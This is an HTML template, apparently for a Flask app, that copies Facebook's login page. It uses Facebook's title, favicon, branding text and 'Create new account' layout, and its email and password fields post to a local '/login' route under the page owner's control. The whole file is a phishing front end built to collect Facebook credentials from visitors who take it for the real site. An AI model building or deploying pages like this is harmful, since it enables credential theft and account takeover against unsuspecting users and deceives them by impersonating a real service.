<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Facebook – log in or sign up</title>
  <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
  <link rel="icon" href="https://www.facebook.com/favicon.ico">
</head>
<body>
  <div class="container">
    <div class="left">
      <h1>facebook</h1>
      <p>Facebook helps you connect and share<br>with the people in your life.</p>
    </div>
    <div class="right">
      <form action="/login" method="POST">
        <input type="text" name="email" placeholder="Email address or phone number" required>
        <input type="password" name="pass" placeholder="Password" required>
        <button type="submit" class="login-btn">Log in</button>
        <a href="#" class="forgot">Forgotten password?</a>
        <div class="line"></div>
        <button type="button" class="create-btn">Create new account</button>
      </form>
      <p class="bottom-text"><b>Create a Page</b> for a celebrity, brand or business.</p>
    </div>
  </div>
</body>
</html>